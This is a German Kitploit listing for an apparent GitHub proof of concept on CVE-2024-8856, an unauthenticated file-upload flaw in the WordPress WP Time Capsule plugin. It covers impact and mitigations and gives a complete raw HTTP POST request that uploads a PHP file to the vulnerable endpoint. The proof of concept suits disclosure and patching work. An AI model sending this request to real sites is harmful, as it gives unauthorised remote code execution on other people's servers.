Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-8856 — WordPress WP Time Capsule Plugin Schwachstelle für beliebigen Dateiupload | Kitploit
Tools/GitHubGitHub/ubaydev/cve-2024-8856
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHububaydev/cve-2024-8856

CVE-2024-8856

WordPress WP Time Capsule Plugin Schwachstelle für beliebigen Dateiupload

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-8856: WordPress WP Time Capsule Plugin Schwachstelle für beliebigen Datei-Upload

Übersicht

CVE-2024-8856 ist eine Sicherheitslücke im WP Time Capsule Plugin für WordPress, die es nicht authentifizierten Benutzern ermöglicht, beliebige Dateien auf den Server hochzuladen. Dies kann zur Ausführung von entferntem Code führen, wenn die hochgeladenen Dateien vom Server ausgeführt werden. Die Schwachstelle entsteht durch unzureichende Dateiprüfung und kann durch das Senden speziell gestalteter Anfragen an den anfälligen Endpunkt ausgenutzt werden.

Betroffene Versionen

  • WP Time Capsule Plugin Versionen vor 1.22.21 (behoben in 1.22.22).

Auswirkungen

Diese Schwachstelle ermöglicht es nicht authentifizierten Benutzern:

  • Bösartige PHP-Skripte auf den Server hochladen.
  • Beliebigen Code auf dem Server ausführen, was zu einer vollständigen Systemkompromittierung führt.
  • Potenziell diesen Zugriff nutzen, um die Webanwendung und die zugrunde liegende Infrastruktur weiter auszunutzen.

Proof of Concept (PoC)

Das Folgende ist ein Proof of Concept, das zeigt, wie die Schwachstelle CVE-2024-8856 durch das Senden einer POST-Anfrage an den anfälligen Endpunkt ausgenutzt werden kann.

Beispielanfrage

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

Erklärung des PoC

  • POST-Anfrage: Die Anfrage ist ein POST an den Pfad, an dem die anfällige Upload-Funktionalität bereitgestellt wird.
  • Content-Type: Die Anfrage setzt den Content-Type auf multipart/form-data, was für Datei-Uploads erforderlich ist.
  • Datei-Upload: Die Datei wird im Body mit einem Content-Disposition-Header angegeben. Im Beispiel wird versucht, eine PHP-Datei mit dem Inhalt <?php phpinfo(); hochzuladen, die bei Ausführung die PHP-Konfigurationsdetails anzeigt.
  • Anfälliger Endpunkt: Der Endpunkt /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php ist der Punkt der Ausnutzung.

Abhilfemaßnahmen

Um diese Schwachstelle zu entschärfen:

  • Plugin aktualisieren: Stellen Sie stets sicher, dass das WP Time Capsule Plugin auf die neueste vom Entwickler bereitgestellte Version aktualisiert ist.
  • Datei-Upload-Beschränkungen: Implementieren Sie Upload-Beschränkungen auf dem Server, um nur bestimmte Dateitypen (z.B. Bilder) zuzulassen und die Ausführung hochgeladener Dateien zu unterbinden.
  • Web Application Firewall (WAF): Verwenden Sie eine Web Application Firewall (WAF), um bösartige Anfragen zu erkennen und zu blockieren, bevor sie Ihren Server erreichen.

Referenzen

CVE-2024-8856 - National Vulnerability Database

Fazit

CVE-2024-8856 ist eine schwerwiegende Schwachstelle, die sofortige Aufmerksamkeit von Administratoren von WordPress-Seiten erfordert, die das WP Time Capsule Plugin verwenden. Es sollten angemessene Vorsichtsmaßnahmen getroffen werden, um die Anwendung vor potenzieller Ausnutzung zu schützen. Bleiben Sie stets auf dem neuesten Stand in Bezug auf Sicherheitspraktiken und Plugin-Updates.

Tool herunterladen